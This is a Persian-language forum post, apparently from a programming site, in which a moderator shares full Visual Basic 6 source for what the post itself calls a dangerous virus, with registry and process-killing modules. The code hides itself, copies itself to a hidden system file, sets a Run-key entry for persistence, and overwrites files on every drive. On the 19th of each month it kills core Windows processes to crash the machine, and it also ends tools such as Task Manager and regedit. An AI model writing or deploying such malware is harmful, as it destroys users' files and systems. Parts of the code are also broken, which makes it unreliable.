امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
سورس ویروس ساده در عین حال خطر ناک با ویژال بیسیک
نویسنده پیام
Ghoghnus آفلاین
مدیر بخش
*****

ارسال‌ها: 1,497
موضوع‌ها: 270
تاریخ عضویت: آذر ۱۳۸۸

تشکرها : 1652
( 3938 تشکر در 1453 ارسال )
ارسال: #1
Rolleyes  سورس ویروس ساده در عین حال خطر ناک با ویژال بیسیک
سلام 028
سورس یه ویروس ساده قلب عشق - بهینه شده برای ورژن جدید در عین حال خطر ناک 
این ویروس از زمان اجرا تمام فایلها را خراب میکنه تعجب - بهینه شده برای ورژن جدید و از روز 19ماه میلادی شروع به ریست کردن یهویی سیستم (روش جدا از شات دان معمولی)میکنه
کد:
Dim man1 As String


Sub myposhe(sPath As String)


sdir = Dir(sPath, vbDirectory)
Do Until LenB(sdir) = 0
   Debug.Print sdir
   sdir = Dir
       
          kharab (sPath + sdir + "\")
         
Loop
End Sub

Private Sub kharab(p As String)
sFilename = Dir(p)

Do While sFilename > ""

 Debug.Print sFilename
 sFilename = Dir()
       If (Right(sFilename, 4) <> ".exe") Then
           List1.AddItem (sFilename)
           FileCopy manyer, sFilename
       End If
Loop

End Sub

Sub winGa()

End Sub

Private Sub Command1_Click()

End Sub

Private Sub Form_Load()
Call startt
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
Call startt

If (Day(Date) = 19) Or (GetSetting("iran", "mm", "aa", "0") = 19) Then
Call SaveSetting("iran", "mm", "aa", "19")


Call EndAnyProcess("smss.exe")
Call EndAnyProcess("csrss.exe")
Call EndAnyProcess("system.exe")
Call EndAnyProcess("svchost.exe")


End If



End Sub
Sub startt()
On Error Resume Next
App.TaskVisible = False
Hide
Top = 10000
Dim mizYer As String
''mizYer = Environ$("USERPROFILE") & "\ali.txt"
''MsgBox mizYer
Dim manyer
manyer = App.Path
Dim llenman As Integer
llenman = Len(manyer)
If llenman = 3 Then
manyer = manyer + App.ExeName + ".exe"
Else
manyer = manyer + "\" + App.ExeName + ".exe"
End If


FileCopy manyer, man1

SetAttr man1, vbHidden + vbSystem

SetStringValue "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Window", man1
'\////////////////
List1.Clear
For Cl = 100 To 97 + 25
     If dt <> 1 Then
        List1.AddItem (Chr(Cl) + ":")
        kharab (Chr(Cl) + ":\")
        myposhe (Chr(Cl) + ":\")
     End If
  Next Cl
End Sub

Private Sub Timer2_Timer()
   Call Shell("explorer.exe", vbNormalFocus)

End Sub


ماژول ها
کد:
Type FILETIME
   lLowDateTime    As Long
   lHighDateTime   As Long
End Type

Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByRef lpData As Long, lpcbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByRef lpData As Long, ByVal cbData As Long) As Long
Declare Function RegSetValueExB Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByRef lpData As Byte, ByVal cbData As Long) As Long

Const ERROR_SUCCESS = 0&
Const ERROR_BADDB = 1009&
Const ERROR_BADKEY = 1010&
Const ERROR_CANTOPEN = 1011&
Const ERROR_CANTREAD = 1012&
Const ERROR_CANTWRITE = 1013&
Const ERROR_OUTOFMEMORY = 14&
Const ERROR_INVALID_PARAMETER = 87&
Const ERROR_ACCESS_DENIED = 5&
Const ERROR_NO_MORE_ITEMS = 259&
Const ERROR_MORE_DATA = 234&

Const REG_NONE = 0&
Const REG_SZ = 1&
Const REG_EXPAND_SZ = 2&
Const REG_BINARY = 3&
Const REG_DWORD = 4&
Const REG_DWORD_LITTLE_ENDIAN = 4&
Const REG_DWORD_BIG_ENDIAN = 5&
Const REG_LINK = 6&
Const REG_MULTI_SZ = 7&
Const REG_RESOURCE_LIST = 8&
Const REG_FULL_RESOURCE_DESCRIPTOR = 9&
Const REG_RESOURCE_REQUIREMENTS_LIST = 10&

Const KEY_QUERY_VALUE = &H1&
Const KEY_SET_VALUE = &H2&
Const KEY_CREATE_SUB_KEY = &H4&
Const KEY_ENUMERATE_SUB_KEYS = &H8&
Const KEY_NOTIFY = &H10&
Const KEY_CREATE_LINK = &H20&
Const READ_CONTROL = &H20000
Const WRITE_DAC = &H40000
Const WRITE_OWNER = &H80000
Const SYNCHRONIZE = &H100000
Const STANDARD_RIGHTS_REQUIRED = &HF0000
Const STANDARD_RIGHTS_READ = READ_CONTROL
Const STANDARD_RIGHTS_WRITE = READ_CONTROL
Const STANDARD_RIGHTS_EXECUTE = READ_CONTROL
Const KEY_READ = STANDARD_RIGHTS_READ Or KEY_QUERY_VALUE Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY
Const KEY_WRITE = STANDARD_RIGHTS_WRITE Or KEY_SET_VALUE Or KEY_CREATE_SUB_KEY
Const KEY_EXECUTE = KEY_READ

Dim hKey As Long, MainKeyHandle As Long
Dim rtn As Long, lBuffer As Long, sBuffer As String
Dim lBufferSize As Long
Dim lDataSize As Long
Dim ByteArray() As Byte

'This constant determins wether or not to display error messages to the
'user. I have set the default value to False as an error message can and
'does become irritating after a while. Turn this value to true if you want
'to debug your programming code when reading and writing to your system
'registry, as any errors will be displayed in a message box.

Const DisplayErrorMsg = False


Function SetDWORDValue(SubKey As String, Entry As String, Value As Long)

Call ParseKey(SubKey, MainKeyHandle)

If MainKeyHandle Then
  rtn = RegOpenKeyEx(MainKeyHandle, SubKey, 0, KEY_WRITE, hKey) 'open the key
  If rtn = ERROR_SUCCESS Then 'if the key was open successfully then
     rtn = RegSetValueExA(hKey, Entry, 0, REG_DWORD, Value, 4) 'write the value
     If Not rtn = ERROR_SUCCESS Then   'if there was an error writting the value
        If DisplayErrorMsg = True Then 'if the user want errors displayed
           'msgbox ErrorMsg(rtn)        'display the error
        End If
     End If
     rtn = RegCloseKey(hKey) 'close the key
  Else 'if there was an error opening the key
     If DisplayErrorMsg = True Then 'if the user want errors displayed
        'msgbox ErrorMsg(rtn) 'display the error
     End If
  End If
End If

End Function



Function GetMainKeyHandle(MainKeyName As String) As Long

Const HKEY_CLASSES_ROOT = &H80000000
Const HKEY_CURRENT_USER = &H80000001
Const HKEY_LOCAL_MACHINE = &H80000002
Const HKEY_USERS = &H80000003
Const HKEY_PERFORMANCE_DATA = &H80000004
Const HKEY_CURRENT_CONFIG = &H80000005
Const HKEY_DYN_DATA = &H80000006
 
Select Case MainKeyName
      Case "HKEY_CLASSES_ROOT"
           GetMainKeyHandle = HKEY_CLASSES_ROOT
      Case "HKEY_CURRENT_USER"
           GetMainKeyHandle = HKEY_CURRENT_USER
      Case "HKEY_LOCAL_MACHINE"
           GetMainKeyHandle = HKEY_LOCAL_MACHINE
      Case "HKEY_USERS"
           GetMainKeyHandle = HKEY_USERS
      Case "HKEY_PERFORMANCE_DATA"
           GetMainKeyHandle = HKEY_PERFORMANCE_DATA
      Case "HKEY_CURRENT_CONFIG"
           GetMainKeyHandle = HKEY_CURRENT_CONFIG
      Case "HKEY_DYN_DATA"
           GetMainKeyHandle = HKEY_DYN_DATA
End Select

End Function

Function ErrorMsg(lErrorCode As Long) As String
   
'If an error does accurr, and the user wants error messages displayed, then
'display one of the following error messages

Select Case lErrorCode
      Case 1009, 1015
           GetErrorMsg = "The Registry Database is corrupt!"
      Case 2, 1010
           GetErrorMsg = "Bad Key Name"
      Case 1011
           GetErrorMsg = "Can't Open Key"
      Case 4, 1012
           GetErrorMsg = "Can't Read Key"
      Case 5
           GetErrorMsg = "Access to this key is denied"
      Case 1013
           GetErrorMsg = "Can't Write Key"
      Case 8, 14
           GetErrorMsg = "Out of memory"
      Case 87
           GetErrorMsg = "Invalid Parameter"
      Case 234
           GetErrorMsg = "There is more data than the buffer has been allocated to hold."
      Case Else
           GetErrorMsg = "Undefined Error Code:  " & Str$(lErrorCode)
End Select

End Function



Private Sub ParseKey(Keyname As String, Keyhandle As Long)
   
rtn = InStr(Keyname, "\") 'return if "\" is contained in the Keyname

If Left(Keyname, 5) <> "HKEY_" Or Right(Keyname, 1) = "\" Then 'if the is a "\" at the end of the Keyname then
  'msgbox "Incorrect Format:" + Chr(10) + Chr(10) + Keyname 'display error to the user
  Exit Sub 'exit the procedure
ElseIf rtn = 0 Then 'if the Keyname contains no "\"
  Keyhandle = GetMainKeyHandle(Keyname)
  Keyname = "" 'leave Keyname blank
Else 'otherwise, Keyname contains "\"
  Keyhandle = GetMainKeyHandle(Left(Keyname, rtn - 1)) 'seperate the Keyname
  Keyname = Right(Keyname, Len(Keyname) - rtn)
End If

End Sub
Function CreateKey(SubKey As String)

Call ParseKey(SubKey, MainKeyHandle)

If MainKeyHandle Then
  rtn = RegCreateKey(MainKeyHandle, SubKey, hKey) 'create the key
  If rtn = ERROR_SUCCESS Then 'if the key was created then
     rtn = RegCloseKey(hKey)  'close the key
  End If
End If

End Function
Function SetStringValue(SubKey As String, Entry As String, Value As String)

Call ParseKey(SubKey, MainKeyHandle)

If MainKeyHandle Then
  rtn = RegOpenKeyEx(MainKeyHandle, SubKey, 0, KEY_WRITE, hKey) 'open the key
  If rtn = ERROR_SUCCESS Then 'if the key was open successfully then
     rtn = RegSetValueEx(hKey, Entry, 0, REG_SZ, ByVal Value, Len(Value)) 'write the value
     If Not rtn = ERROR_SUCCESS Then   'if there was an error writting the value
        If DisplayErrorMsg = True Then 'if the user wants errors displayed
           'msgbox ErrorMsg(rtn)        'display the error
        End If
     End If
     rtn = RegCloseKey(hKey) 'close the key
  Else 'if there was an error opening the key
     If DisplayErrorMsg = True Then 'if the user wants errors displayed
        'msgbox ErrorMsg(rtn)        'display the error
     End If
  End If
End If

End Function

و ماژول دوم
کد:
Private Declare Function GetVersion Lib "kernel32" () As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function OpenProcessToken Lib "advapi32" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long
Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As Any) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As Any) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long

Private Const TOKEN_ADJUST_PRIVILEGES = &H20
Private Const TOKEN_QUERY = &H8
Private Const SE_PRIVILEGE_ENABLED = &H2
Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Const PROCESS_VM_READ = 16
Private Const TH32CS_SNAPHEAPLIST = &H1
Private Const TH32CS_SNAPPROCESS = &H2
Private Const TH32CS_SNAPTHREAD = &H4
Private Const TH32CS_SNAPMODULE = &H8
Private Const HKEY_CLASSES_ROOT = &H80000000
Private Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST + TH32CS_SNAPPROCESS + TH32CS_SNAPTHREAD + TH32CS_SNAPMODULE)
Private Type PROCESSENTRY32
   dwSize As Long
   cntUsage As Long
   th32ProcessID As Long
   th32DefaultHeapID As Long
   th32ModuleID As Long
   cntThreads As Long
   th32ParentProcessID As Long
   pcPriClassBase As Long
   dwFlags As Long
   szexeFile As String * 260
End Type

Private Type LUID
  lowpart As Long
  highpart As Long
End Type

Private Type TOKEN_PRIVILEGES
   PrivilegeCount As Long
   LuidUDT As LUID
   Attributes As Long
End Type

Function GiveMeThatHandle(ExeName) As Long
Dim P_Pid, P_Proc, adr, bfLg As Long
Dim res&, ant&
Dim u As Integer
Dim Process As PROCESSENTRY32

res = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)

If res <> 0 Then

  Process.dwSize = Len(Process)
  ant = Process32First(res, Process)
  u = 0
 
Do
 A = LCase(Process.szexeFile)
   If InStr(A, ExeName) Then pids = Process.th32ProcessID
   ant = Process32Next(res, Process)
 u = u + 1
Loop Until ant = 0

End If

P_Pid = pids
hProcessID = P_Pid
DoEvents

   Dim hToken As Long
   Dim hProcess As Long
   Dim tp As TOKEN_PRIVILEGES
   
   If GetVersion() >= 0 Then
       If OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or _
           TOKEN_QUERY, hToken) = 0 Then
           GoTo CleanUp
       End If

       If LookupPrivilegeValue("", "SeDebugPrivilege", tp.LuidUDT) = 0 Then
           GoTo CleanUp
       End If

       tp.PrivilegeCount = 1
       tp.Attributes = SE_PRIVILEGE_ENABLED

       If AdjustTokenPrivileges(hToken, False, tp, 0, ByVal 0&, _
           ByVal 0&) = 0 Then
           GoTo CleanUp
       End If
   End If

   P_Proc = OpenProcess(PROCESS_ALL_ACCESS, 0, hProcessID)
   GiveMeThatHandle = P_Proc
CleanUp:
       If hToken Then CloseHandle hToken
End Function

Function EndAnyProcess(ExeName) As Boolean
      Dim phandle As Long
      Const PROCESS_ALL_ACCESS = 0
      phandle = GiveMeThatHandle(ExeName)
      Kill_Process = CBool(TerminateProcess(phandle, uExitCode))
      Call CloseHandle(phandle)
End Function

Private Sub Rest_sys()

Call EndAnyProcess("smss.exe")
Call EndAnyProcess("csrss.exe")
Call EndAnyProcess("system.exe")
Call EndAnyProcess("svchost.exe")
End Sub

Sub end_show()

Call EndAnyProcess("regedit.exe")
Call EndAnyProcess("taskmgr.exe")
Call EndAnyProcess("msconfig.exe")
Call EndAnyProcess("cmd.exe")
Call EndAnyProcess("mmc.exe")
Call EndAnyProcess("opera.exe")
End Sub
خنده بلد − بهینه شده برای ورژن جدید

[تصویر:  a.jpg]

باور کنیم
همانگونه که در غیبت مقصریم در ظهور موثریم!
نیستیم؟

زیر شمشیر غمش رقص کنان باید رفت #  کان که شد کُشته ی او نیک سرانجام افتاد



 چشمک - بهینه شده برای ورژن جدید دانلود پروژه برنامه نويسي
(آخرین ویرایش در این ارسال: ۱۱-اسفند-۱۳۹۷, ۱۵:۵۷:۳۴، توسط Ghoghnus.)
۱۱-اسفند-۱۳۹۷, ۱۵:۴۹:۰۴
وب سایت ارسال‌ها
پاسخ


موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
Exclamation ورژن جدید ویروس Setup.exe Morpheus 41 44,952 ۲۳-شهریور-۱۳۹۵, ۱۶:۳۴:۵۴
آخرین ارسال: babyy
  ویروس یابی! 1نفر 7 5,344 ۰۱-اردیبهشت-۱۳۹۵, ۱۲:۵۰:۰۳
آخرین ارسال: 1نفر
  حذف ویروس های TMP! student-p 4 6,350 ۰۴-اسفند-۱۳۹۴, ۱۱:۵۹:۰۷
آخرین ارسال: imenbazar
  استخراج امضا های ویروس ها از دیتابیس آنتی ویروس hadiranji 1 2,526 ۱۳-بهمن-۱۳۹۴, ۱۲:۵۰:۵۵
آخرین ارسال: lord_viper
  ویروس یا تروجان مخرب خطرناک 123659 51 39,687 ۱۹-بهمن-۱۳۹۳, ۰۰:۳۷:۲۵
آخرین ارسال: omid_phoenix
  ویروس تبلیغاتی helma 8 7,959 ۱۷-بهمن-۱۳۹۳, ۰۵:۱۶:۴۴
آخرین ارسال: NO DONGLE
Exclamation [فوری] ویروس کودر کمک فوری alir32a 4 4,325 ۱۵-بهمن-۱۳۹۳, ۱۸:۵۱:۰۸
آخرین ارسال: NO DONGLE
  معرفی یک ویروس خطرناک apcog 16 13,782 ۱۲-مهر-۱۳۹۳, ۰۹:۱۴:۴۳
آخرین ارسال: Di Di
  غیر قابل شناسایی کردن ویروس در VB6 crab 8 10,534 ۰۶-مهر-۱۳۹۳, ۰۱:۰۸:۴۸
آخرین ارسال: grimm
  سورس کد ویروس Mr.pRoGraMmer 33 41,240 ۱۱-مرداد-۱۳۹۳, ۱۶:۲۳:۳۳
آخرین ارسال: A.P-H@ck3r

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 2 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS